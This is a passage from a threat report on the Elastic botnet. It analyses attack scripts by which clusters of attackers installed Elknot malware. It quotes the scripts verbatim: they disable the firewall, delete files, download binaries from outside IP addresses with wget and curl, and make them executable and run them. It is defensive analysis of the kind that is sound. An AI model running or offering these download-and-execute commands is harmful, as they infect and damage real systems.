Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
service iptables stop<br />
rm -r /tmp/*<br />
wget -O /tmp/Hostys http://117.21.176.64:4899/http<br />
chmod 777 /tmp/Hostys<br />
nohup /tmp/Hostys > /dev/null 2>&1<br />
/tmp/Hostys<br />
./tmp/Hostys<br />
wget -O /tmp/Hostus http://117.21.176.64:4899/http<br />
chmod 777 /tmp/Hostys<br />
nohup /tmp/Hostys > /dev/null 2>&1<br />
/tmp/Hostys<br />
./tmp/Hostys<br />
wget -O /tmp/Hostus http://117.21.176.64:4899/http<br />
su root<br />
chmod 777 /tmp/Hostys<br />
nohup /tmp/Hostys > /dev/null 2>&1<br />
/tmp/Hostys<br />
./tmp/Hostys<br />
wget -O /tmp/Hostus http://117.21.176.64:4899/http<br />
chmod 777 /tmp/Hostys<br />
nohup /tmp/Hostys > /dev/null 2>&1<br />
/tmp/Hostys<br />
./tmp/Hostys<br />
wget -O /tmp/Hostus http://117.21.176.64:4899/http<br />
4.1.4 INFRASTRUCTURE-TTP CLUSTER D ATTACK SCRIPT<br />
Cluster D attempted to installed Elknot malware on vulnerable systems. Unlike the previously identified<br />
Clusters, Cluster D used a very short sequence of commands to attempt to infect a vulnerable host. The<br />
entire attack script consists of 6 commands executed over a 21 second time frame:<br />
rm *<br />
curl -o /tmp/down http://183.61.171.225:8818/down<br />
wget -c http://183.61.171.225:8818/down<br />
chmod 777 /tmp/./down<br />
/t mp/./dow n<br />
rm /tmp/*<br />
The simplicity of the attack script suggests that the actor does not have any type of automated<br />
feedback loop on whether an attack was successful or not. At the very least, however, the attacker<br />
was resourceful enough to use two different command line download tools to increase the chances of<br />
a download, and potential infection, being successful.<br />
4.1.5 INFRASTRUCTURE-TTP CLUSTER E ATTACK SCRIPT<br />
The attack script of Cluster E is by far the most simplistic and ineffective example of all the Cluster’s<br />
attack scripts. The attack script consists of the single line<br />
THE ELASTIC BOTNET REPORT<br />
50